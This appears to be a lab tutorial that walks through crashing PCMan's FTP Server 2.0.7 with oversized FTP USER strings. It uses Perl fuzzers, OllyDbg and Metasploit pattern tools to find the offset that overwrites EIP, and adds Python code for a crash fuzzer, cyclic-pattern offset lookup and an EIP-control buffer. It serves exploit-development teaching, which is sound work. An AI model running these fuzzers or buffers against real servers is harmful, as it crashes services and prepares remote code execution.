PCMan's FTP Server 2.0.7 - Buffer Overflow Exploit
PCMan is Online
Note(FYI):
Notice the FTP Server is online. I apologize for the repetitive starting and stopping of the FTP Server.

Open fuzzer1.pl (On Kali 1.0.5)
Instructions:
cd /var/tmp/BUFFER/PCMan
leafpad fuzzer1.pl
Note(FYI):
Arrow #1, Use (cd) to navigate to the (/var/tmp/BUFFER/PCMan) directory.
Arrow #2, Use (leafpad) to open (fuzzer1.pl). Leafpad is a simple GTK+ based text editor. The user interface is similar to Windows(tm) Notepad.

Explain fuzzer1.pl (Command Line Arguments) (On Kali 1.0.5)
Instructions:
Select Options and check Word Wrap and Line Numbers.
Scroll down to Line 17.
Note(FYI):
Arrow #2, The script (fuzzer1.pl) takes three command line arguments: IPADDRESS, PORT and COUNT. E.g., ./fuzzer1.pl 192.168.2.106 21 2020
IPADDRESS - The IP address of the target (the attack vector).
PORT - The port on which the target service listens.
COUNT - The number of characters that will be sent to that IPADDRESS and PORT.

Explain fuzzer1.pl Essential Variables (On Kali 1.0.5)
Instructions:
Arrow #1 [Line 37], The ($header) variable is composed of the string (USER) plus a single space. The characters that come after the (USER ) string are the actual username (e.g., JOHNDOE, or AAAA[2200]AAAA...).
Arrow #2 [Line 42], The ($junk) variable contains the username that is supplied immediately after the $header. Ultimately, the $junk variable is used to overflow the USER buffer within PCMan.
Normal usage, e.g.: USER JOHNDOE
Abnormal usage, e.g.: USER AAAA[2200]AAAA...
Arrow #3 [Line 46], The ($string) variable contains the byte (x41), the hexadecimal code for an A, repeated OFFSET_COUNT times. In the example below, 2200 A's would be sent to PCMan. E.g., ./fuzzer1.pl 192.168.2.106 21 2200
Arrow #4 [Line 49], The ($socket) variable is used to create a TCP connection to $IPADDRESS on port $PORT.
Arrow #5 [Line 53], The call $socket->send($string) sends the $string composed of (USER AAAA[2200]AAAA...) to the specified $IPADDRESS and $PORT.
Arrow #6 [Line 57], The call close($socket) closes the TCP connection.
Arrow #7, Click the icon to close leafpad.

PCMan Fuzz Test (Part 1) (On Kali 1.0.5)
Note(FYI):
Replace (192.168.2.106) with your Damn Vulnerable WXP-SP2 address found in (Section 1, Step 7).
Instructions:
cd /var/tmp/BUFFER/PCMan
./fuzzer1.pl
./fuzzer1.pl 192.168.2.106 21 10
./fuzzer1.pl 192.168.2.106 21 100
./fuzzer1.pl 192.168.2.106 21 1000
Note(FYI):
Arrow #1, Use (cd) to navigate to the (/var/tmp/BUFFER/PCMan) directory.
Arrow #2, Run (fuzzer1.pl) with no arguments to see which parameters are required for the program to execute as designed.
Arrow #3, Use (fuzzer1.pl) to send 10 A's to (192.168.2.106) over port 21.
Arrow #4, Use (fuzzer1.pl) to send 100 A's to (192.168.2.106) over port 21.
Arrow #5, Use (fuzzer1.pl) to send 1000 A's to (192.168.2.106) over port 21.
No buffer overflow will occur for Arrows #3-#5.

Review of Initial Fuzzing Test (Part 1) (On Damn Vulnerable WXP-SP2)
Instructions:
Notice that 10 A's were sent and the User name is okay (the server still processes the USER command normally).
Notice that 100 A's were sent and the User name is okay.
Notice that 1000 A's were sent and the User name is okay.
Note(FYI):
Arrows #1-#3, The goal of fuzzing is to find out: (1) at what point the application stops working as designed, (2) at what point the application crashes, and (3) at what point the application allows exploitation to occur. We are not at that point yet.

Exit PCMan
Instructions:
--> (See Picture)
Click the Yes button.
Note(FYI):
It is not strictly necessary to exit PCMan at this point. The purpose of exiting is to clear the application's input and output streams.
Start PCMan FTP Server (On Damn Vulnerable WXP-SP2)
Instructions:
Right click on PCMANFTPD2.
Click on Open.

PCMan is Online
Note(FYI):
Notice the FTP Server is online. I apologize for the repetitive starting and stopping of the FTP Server.

Run OLLYDBG
Instructions:
Right click on the OLLYDBG desktop icon.
Select Open.

Attach OLLYDBG to PCMan Process (Part 1)
Instructions:
File --> Attach

Attach OLLYDBG to PCMan Process (Part 2)
Instructions:
Click on PCManFTPD2.
Click on the Attach button.
Note(FYI):
Arrow #1, Make sure PCManFTPD2 is highlighted in light gray.
Arrow #2, OLLYDBG is an x86 debugger that lets us view and trace memory locations and registers, determine offsets, determine which DLLs are loaded, and much more.

OllyDbg Views Briefly Explained
Note(FYI):
Arrow #1, The upper left window pane shows the disassembled instructions being executed by the program.
Arrow #2, The lower left window pane is the memory dump: address, hex bytes and their ASCII representation.
Arrow #3, The upper right window pane shows the CPU registers, which we will rely on throughout the buffer overflow investigation.
Arrow #4, The lower right window pane shows the stack itself, which is used in conjunction with the Structured Exception Handler (SEH) chain.

Start OllyDbg
Instructions:
Notice that OllyDbg is currently paused.
Click the Play icon; paused will change to running.
Click PCMan in the taskbar.
Note(FYI):
Arrow #1, PCMan stays suspended until the Play icon is clicked.
Arrow #3, You are asked to click on PCMan in the taskbar to bring the PCMan application to the foreground, so you can watch the subsequent buffer overflow attempts.

Open fuzzer2.pl (On Kali 1.0.5)
Instructions:
leafpad fuzzer2.pl
Note(FYI):
Arrow #1, Use (leafpad) to open (fuzzer2.pl). Leafpad is a simple GTK+ based text editor. The user interface is similar to Windows(tm) Notepad.

View fuzzer2.pl Standard Input
Instructions:
Select Options and check Word Wrap and Line Numbers.
Arrow #2 [Line 21], This is a subroutine called &get_info.
Calling it transfers execution to the code between lines 24 and 53.
Arrow #3 [Line 27], The ($target) variable receives user input for the IP address.
Arrow #4 [Line 30], The ($port) variable receives user input for the port number.
Arrow #5 [Line 33], The ($start_fuzz) variable receives user input for the starting number of characters sent as the PCMan USER name (e.g., start at 2000 A's).
Arrow #6 [Line 36], The ($end_fuzz) variable receives user input for the ending number of characters sent as the PCMan USER name (e.g., end at 3000 A's).
Note(FYI):
Arrows #2-6, <STDIN> is the Perl filehandle used in this subroutine to read user input from the keyboard.

Explain fuzzer2.pl (&commence Sub Routine)
Instructions:
Arrow #1 [Line 40], IF any of the variables $target, $port, $start_fuzz or $end_fuzz is blank, THEN display the usage and exit the program.
Arrow #2 [Line 51], IF the test on Line 40 is FALSE, THEN call the &commence subroutine.
Arrow #2 [Lines 51-60], The variables ($target, $port, $start_fuzz, $end_fuzz) are passed to the subroutine that starts at Line 55.
Note(FYI):
Arrow #3, Notice the following:
$target passed on Line 51 is received as $target on Line 57.
$port passed on Line 51 is received as $port on Line 58.
$start_fuzz passed on Line 51 is received as $start_fuzz on Line 59.
$end_fuzz passed on Line 51 is received as $end_fuzz on Line 60.

Explain fuzzer2.pl (While Loop and Time Out)
Instructions:
Arrow #1 [Line 71], Keep the program running inside the while loop as long as a socket can still be established to the IP/port AND the $end_fuzz count has not been exceeded. ($end_fuzz) is the character count at which the program gives up if it has not managed to crash the target.
Arrow #2 [Line 75], Create a TCP socket to IP ($target) and port ($port). The timeout is set to 1 second; it corresponds to the alarm on Line 83.
Arrow #1 [Lines 77, 81-83], ($buff_num) is the number of characters we sent to the application on the previous iteration.
If the socket times out, the alarm signal (Line 83) triggers the print on Line 82 reporting that the application crashed, and $buff_num tells you which buffer length did it.
Note(FYI):
Arrows #1-4, The purpose of explaining the code is so you become proficient at understanding how something works (whether it is primitive or not), as opposed to only being a tool jockey. It's nice to have the ability and confidence to write your own vulnerability scanner, rather than waiting until the next day or paying big bucks to somebody else.

Explain fuzzer2.pl (Socket Determination)
Instructions:
Arrow #1 [Line 92], IF a TCP socket was established to IP ($target) and port ($port), THEN execute Lines 92 to 101.
Arrow #2 [Line 100], Pass the IP ($target), port ($port) and the FUZZER_COUNT ($num) to the &fuzzer subroutine.
Arrow #2 [Lines 92, 102-109], IF a TCP socket was NOT established to IP ($target) and port ($port), THEN exit the program.

Explain fuzzer2.pl (Send Fuzzer String)
Instructions:
Arrow #1 [Lines 122-124], The variables $target, $port and $fuznum receive their values from the call &fuzzer($target,$port,$num).
Arrow #2 [Line 126], Assign "USER " to the $header variable.
Arrow #3 [Lines 130-132], Open a socket to IP ($target) and port ($port) and assign it to $socket. IF the $socket was created, THEN execute the first block of curly braces {}.
Arrow #4 [Line 134], Assign to $exploit the byte (x41), the hexadecimal code for an A, repeated $fuznum times. So, if $fuznum is 2200, then 2200 A's (41) are assigned to the $exploit variable.
Arrow #5 [Line 135], Assign "USER AAAAAA...." to the $string variable.
Arrow #6 [Line 137], Print (send) the $string to the $socket. This is the line that will eventually cause the buffer overflow.
Arrow #7 [Lines 132, 147-153], IF the $socket was not created, THEN exit the program.
Click the icon to close leafpad.
Note(FYI):
Arrows #1-6, The purpose of this function is to find out how many characters sent to the PCMan USER command are required to crash the application.
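The two scripts walked through above (fuzzer1.pl, a single shot of COUNT A's, and fuzzer2.pl, the loop that walks a range and detects the crash through a socket timeout) are described but not reproduced on this page. The following Python 3 script is an added example written for this page, not the tutorial's Perl code: build_payload() is the fuzzer1.pl idea and fuzz_range() the fuzzer2.pl loop. The lab address, the 1-second timeout and the function names are this example's assumptions, and it appends CRLF to the USER line so the server treats it as a complete command, which the tutorial's description of its own scripts does not mention.

```python
#!/usr/bin/env python3
"""Added example: incremental FTP USER fuzzer in the spirit of fuzzer1.pl / fuzzer2.pl.

Not the tutorial's Perl code. Run only against a lab target you own.
"""
import socket
import sys

HEADER = b"USER "   # FTP USER command; the username follows a single space (RFC 959)
TIMEOUT = 1.0       # seconds; mirrors the 1-second alarm in fuzzer2.pl (assumption)


def build_payload(count: int, filler: bytes = b"\x41") -> bytes:
    """Return b'USER ' + filler * count + CRLF.

    count is the number of filler bytes (the tutorial's COUNT / $fuznum);
    0x41 is 'A'. CRLF makes the server treat the line as a complete command.
    """
    if count < 0:
        raise ValueError("count must be >= 0")
    return HEADER + filler * count + b"\r\n"


def probe_target(host: str, port: int, payload: bytes, timeout: float = TIMEOUT) -> bool:
    """Connect, read the 220 banner, send the payload, wait for the reply.

    Returns True if the service answered the USER command, False if the
    connection was refused/reset or nothing came back within the timeout.
    """
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.settimeout(timeout)
            if not s.recv(1024):          # empty read: peer closed before greeting
                return False
            s.sendall(payload)
            return bool(s.recv(1024))     # expect '331 User name okay...' or similar
    except (OSError, socket.timeout):     # refused, reset, or alarm-style timeout
        return False


def fuzz_range(host, port, start, stop, step=1, probe=probe_target):
    """Send buffers of start..stop filler bytes until the service stops answering.

    Returns (first_unanswered_count, last_answered_count), or None if every
    length in the range was answered. last_answered_count matters because a
    crash may only become visible on the *next* connection, which is exactly
    the case fuzzer2.pl handles with $buff_num.
    """
    last_ok = None
    for count in range(start, stop + 1, step):
        if not probe(host, port, build_payload(count)):
            return count, last_ok
        last_ok = count
    return None


if __name__ == "__main__":
    # Usage: fuzz.py IPADDRESS PORT START STOP   (e.g. 192.168.2.106 21 1999 2020 in the lab)
    if len(sys.argv) != 5:
        sys.exit(f"usage: {sys.argv[0]} IPADDRESS PORT START STOP")
    host, port = sys.argv[1], int(sys.argv[2])
    start, stop = int(sys.argv[3]), int(sys.argv[4])
    hit = fuzz_range(host, port, start, stop)
    if hit is None:
        print(f"no crash between {start} and {stop} filler bytes")
    else:
        print(f"no answer at {hit[0]} bytes (last answered: {hit[1]}); check the debugger")
```

Invoked as fuzz.py 192.168.2.106 21 1999 2020 it walks the same range as the fuzzer2.pl run in the next step. It reports both the first length that went unanswered and the last that was answered, because a server that crashes while handling length N may still have sent its reply, so the dead listener only shows up at N+1; compare both numbers with the state OllyDbg is paused in.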
PCMan Fuzz Test using fuzzer2.pl (On Kali 1.0.5)
Note(FYI):
Replace (192.168.2.106) with your Damn Vulnerable WXP-SP2 address found in (Section 1, Step 7).
Instructions:
./fuzzer2.pl
Enter IP Address: 192.168.2.106
Enter Port Number: 21
Enter Fuzz Start Number: 1999
Enter Fuzz Stop Number: 2020
My crash number is 2001; record your crash number.
Note(FYI):
Arrow #1, Use (fuzzer2.pl) to send a sequence of increasingly long buffers until PCMan crashes, at which point OllyDbg drops back into Paused mode.
Arrows #4-#5, The start (1999) and stop (2020) fuzz numbers were derived from Master Peleus' article.
Arrow #6, In my case, the fuzzer was unable to communicate with PCMan after sending 2001 A's (i.e., A = x41).

Viewing OllyDbg Results (On Damn Vulnerable WXP-SP2)
Instructions:
Notice that OllyDbg is currently paused because PCMan crashed.
Notice that the EBP register contains the value (41410002).
See the Note(FYI) section below for EIP details.
Note(FYI):
Arrow #2, EBP is a non-volatile general-purpose register that has two distinct uses depending on compiler settings: (1) it is either the frame pointer or (2) an ordinary general-purpose register. As the frame pointer, EBP records where the stack frame begins when a function is entered. In this case you can see that its two high-order bytes were overwritten with AA (41 41 00 02).
Arrow #3, The EIP register always contains the address of the next instruction to be executed. Our goal over the next sections is to determine the exact offset so we can control what is placed in EIP. If we can accomplish this, then we have a high probability of later telling EIP (i.e., the pointer to the next instruction) to execute our shellcode instead of the application simply crashing. :-)

Copy the EIP
Instructions:
Left click to highlight, then right click on the EIP.
Click Copy selection to clipboard.
Click the Close icon.

Using pattern_offset.rb (On Kali 1.0.5)
Note(FYI):
Replace (0012FE44) with your EIP value obtained in the previous step.
You should be able to paste if you have VMware Tools installed.
Instructions:
/usr/share/metasploit-framework/tools/pattern_offset.rb 0012FE44
Notice that the offset was not found.
Note(FYI):
Arrow #1, Use (pattern_offset.rb) to "try" to find the position within the buffer of the four bytes that landed in EIP (0012FE44). Remember, the offset is the number of bytes that come before the four bytes that overwrite EIP.
Arrow #2, No match will occur, because pattern_offset.rb can only locate a value that came from a pattern_create.rb pattern. The buffer we sent was nothing but A's, so the value in EIP carries no positional information (here it is not even 41414141 but what looks like a stack address, 0012FE44). The following section shows how to determine the offset using a unique pattern instead.

Section 12: PCMan Fuzz Test Using pattern_create.rb and pattern_offset.rb
Section Notes
Notes(FYI):
The previous section gave you a very primitive way to determine how many characters it takes to crash PCMan. However, just opening the virtual fire hose and pointing it at an application is not accurate enough to determine the buffer offset. Fortunately, the Metasploit framework has two sister tools (pattern_create.rb and pattern_offset.rb) that allow us to determine precisely which 4 bytes of the buffer overwrite EIP.

PCMan Fuzz Test (On Kali 1.0.5)
Instructions:
/usr/share/metasploit-framework/tools/pattern_create.rb 2200 | tee pattern.txt
ls -l pattern.txt
Note(FYI):
Arrow #1, Use (pattern_create.rb) to create a unique pattern of 2200 characters. Instead of sending all A's to crash PCMan, we will send this unique string instead. The value left in the EIP register can then be fed to pattern_offset.rb to determine the exact offset. Use (tee) to display the output and also write it to a file called (pattern.txt).
Arrow #2, Use (ls -l) to display the file's general information (permissions, ownership, byte size, last update and name). pattern_create.rb terminates its output with a newline, so expect the size to read 2201 bytes rather than 2200; the extra byte is the newline, not part of the pattern.

Open fuzzer3.pl (On Kali 1.0.5)
Instructions:
leafpad fuzzer3.pl
Note(FYI):
Arrow #1, Use (leafpad) to open (fuzzer3.pl). Leafpad is a simple GTK+ based text editor.
The user interface is similar to Windows(tm) Notepad.

Explain fuzzer3.pl (Command Line Arguments)
Instructions:
Select Options and check Word Wrap and Line Numbers.
Arrow #2 [Lines 17-18], Assign $IPADDRESS and $PORT from their corresponding command line arguments.
Arrow #3 [Lines 20-27], IF either $IPADDRESS or $PORT was not provided on the command line, THEN exit the program.

Explain fuzzer3.pl (Does pattern.txt Exist)
Instructions:
Arrow #1 [Lines 30-38], IF the file (pattern.txt) that you created in (Section 12, Step 1) does not exist, THEN exit the program.
Arrow #2 [Line 46], Assign "USER " to the ($header) variable. In order to provide a username to an FTP server (i.e., PCMan), you must first send the string (USER) followed by a space and then the actual username, e.g., (USER JOHNDOE).
Arrow #3 [Line 52], Use (cat) to assign the entire string of characters in the file (pattern.txt) to the ($junk) variable. The ($junk) variable is the fake username that follows the header string (USER ). E.g., $junk = "Aa0Aa1Aa2Aa3Aa4..."
Arrow #4 [Line 56], Assign to the ($string) variable the ($header) variable with the ($junk) variable appended. E.g., (USER Aa0Aa1Aa2Aa3...)

View fuzzer3.pl (Establish Socket, Send Data)
Instructions:
Arrow #1 [Line 59], Establish a TCP socket connection and assign it to the ($socket) variable.
Arrow #2 [Line 63], Use $socket->send($string) to send the ($string) variable over the $socket TCP connection.
Arrow #3 [Line 63], Use close($socket) to close the $socket TCP connection.
Click the icon to close leafpad.

Start PCMan FTP Server (On Damn Vulnerable WXP-SP2)
Instructions:
Right click on PCMANFTPD2.
Click on Open.

PCMan is Online
Note(FYI):
Notice the FTP Server is online. I apologize for the repetitive starting and stopping of the FTP Server.
Run OLLYDBG
Instructions:
Right click on the OLLYDBG desktop icon.
Select Open.

Attach OLLYDBG to PCMan Process (Part 1)
Instructions:
File --> Attach

Attach OLLYDBG to PCMan Process (Part 2)
Instructions:
Click on PCManFTPD2.
Click on the Attach button.
Note(FYI):
Arrow #1, Make sure PCManFTPD2 is highlighted in light gray.
Arrow #2, OLLYDBG is an x86 debugger that lets us view and trace memory locations and registers, determine offsets, determine which DLLs are loaded, and much more.

Start OllyDbg
Instructions:
Notice that OllyDbg is currently paused.
Click the Play icon; paused will change to running.
Click PCMan in the taskbar.
Note(FYI):
Arrow #1, PCMan stays suspended until the Play icon is clicked.
Arrow #3, You are asked to click on PCMan in the taskbar to bring the PCMan application to the foreground, so you can watch the subsequent buffer overflow attempt.

PCMan Fuzz Test Using fuzzer3.pl (On Kali 1.0.5)
Note(FYI):
Replace (192.168.2.106) with your Damn Vulnerable WXP-SP2 address found in (Section 1, Step 7).
Instructions:
./fuzzer3.pl 192.168.2.106 21
Note(FYI):
Arrow #1, Use (fuzzer3.pl) to send the unique 2200-character string created by pattern_create.rb to PCMan.

Viewing OllyDbg Results (On Damn Vulnerable WXP-SP2)
Instructions:
Notice that OllyDbg is currently paused because PCMan crashed.
Notice that both the ESP and ESI registers point to strings containing fragments of the unique pattern.
Left click on the EIP value, then right click to pop up a menu.
Click Copy selection to clipboard.
Click the Close icon.
Note(FYI):
Arrows #3-4, Make sure you copy your EIP value instead of mine. It is very possible that yours will be different.
Open Notepad
Instructions:
Click the Start button.
All Programs --> Accessories --> Notepad

Paste EIP Value
Instructions:
Edit --> Paste

Save File
Instructions:
File --> Save As...
Navigate to the following folder: C:\BUFFER\PCMan
File name: eip_value.txt
Click the Save button.
Note(FYI):
We are saving the address just in case you are unable to paste it in the next step.

Using pattern_offset.rb (On Kali 1.0.5)
Note(FYI):
Replace (386F4337) with your EIP value obtained in the previous step. You should be able to paste if you have VMware Tools installed.
Instructions:
/usr/share/metasploit-framework/tools/pattern_offset.rb 386F4337
Record your offset. In my case, it is 2003.
Note(FYI):
Arrow #1, Use (pattern_offset.rb) to find where the four bytes now in EIP (386F4337) sit within the pattern. Because x86 is little-endian, the value 386F4337 corresponds to the bytes 37 43 6F 38 in memory, i.e., the substring "7Co8" of the pattern.
Arrow #2, Make sure you record your offset. It is important to note that (in my case) 2003 bytes of the buffer come before the four bytes that overwrite EIP: bytes 0 through 2002 are filler, and bytes 2003 through 2006 land in EIP.
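As an added check on the two Metasploit tools used in this section (this is example code written for this page, not Metasploit's Ruby and not the tutorial's fuzzer3.pl), the following Python 3 reimplements the pattern scheme behind pattern_create.rb and the little-endian offset lookup behind pattern_offset.rb, so you can see why the all-A crash value (0012FE44) matched nothing while 386F4337 resolves to offset 2003. The function names and the confirmation buffer layout (filler, then four B's where EIP lands, then C's) are this example's own conventions.

```python
#!/usr/bin/env python3
"""Added example: pattern_create / pattern_offset logic in Python 3.

Reimplements the scheme used by Metasploit's pattern_create.rb and
pattern_offset.rb for explanation only; it is not Metasploit's code.
"""
import itertools
import string
from typing import Optional

# One full period: 26 uppers x 26 lowers x 10 digits, three bytes each = 20280 bytes.
# Every 4-byte window inside a single period is unique, which is what lets the
# value left in EIP map back to exactly one position in the buffer.
_TRIPLES = [(u + l + d).encode() for u, l, d in itertools.product(
    string.ascii_uppercase, string.ascii_lowercase, string.digits)]
PERIOD = b"".join(_TRIPLES)


def pattern_create(length: int) -> bytes:
    """Return the first `length` bytes of the cyclic pattern (Aa0Aa1Aa2...)."""
    if length < 0:
        raise ValueError("length must be >= 0")
    reps = length // len(PERIOD) + 1     # beyond 20280 bytes the pattern repeats
    return (PERIOD * reps)[:length]


def eip_to_bytes(eip_hex: str) -> bytes:
    """Turn an EIP value as OllyDbg shows it ('386F4337') into the bytes as they sat in memory.

    x86 is little-endian, so 0x386F4337 was stored as 37 43 6F 38 == b'7Co8'.
    """
    return int(eip_hex, 16).to_bytes(4, "little")


def pattern_offset(needle: bytes, length: int = len(PERIOD)) -> Optional[int]:
    """Byte offset of `needle` within pattern_create(length), or None if absent.

    None is what a crash produced by a buffer of plain A's yields: the four
    bytes in EIP then carry no positional information.
    """
    idx = pattern_create(length).find(needle)
    return None if idx < 0 else idx


def confirmation_buffer(offset: int, total: int) -> bytes:
    """Layout to re-test a found offset: `offset` bytes of A, four B's, then C's.

    If the offset is right, EIP reads 42424242 on the next crash and the
    registers that pointed into the pattern now point into the C's.
    (Layout is this example's convention, not the tutorial's.)
    """
    if total < offset + 4:
        raise ValueError("total must leave room for the 4 EIP bytes")
    return b"A" * offset + b"B" * 4 + b"C" * (total - offset - 4)


if __name__ == "__main__":
    print(pattern_create(2200).decode())          # same text pattern_create.rb 2200 prints
    for eip in ("0012FE44", "386F4337"):          # the two values seen in this tutorial
        raw = eip_to_bytes(eip)
        print(f"{eip} -> {raw!r} -> offset {pattern_offset(raw)}")
```

Run with no arguments it prints the 2200-byte pattern that was tee'd into pattern.txt above, then resolves the two EIP values from this page. pattern_offset.rb accepts the hex value straight from OllyDbg and performs the same little-endian conversion internally; the raw ASCII fragment visible in ESP or ESI can be looked up directly without conversion. Once an offset is known, confirmation_buffer() gives the buffer to send next: EIP should read 42424242, which proves the four bytes are under your control before any shellcode is involved.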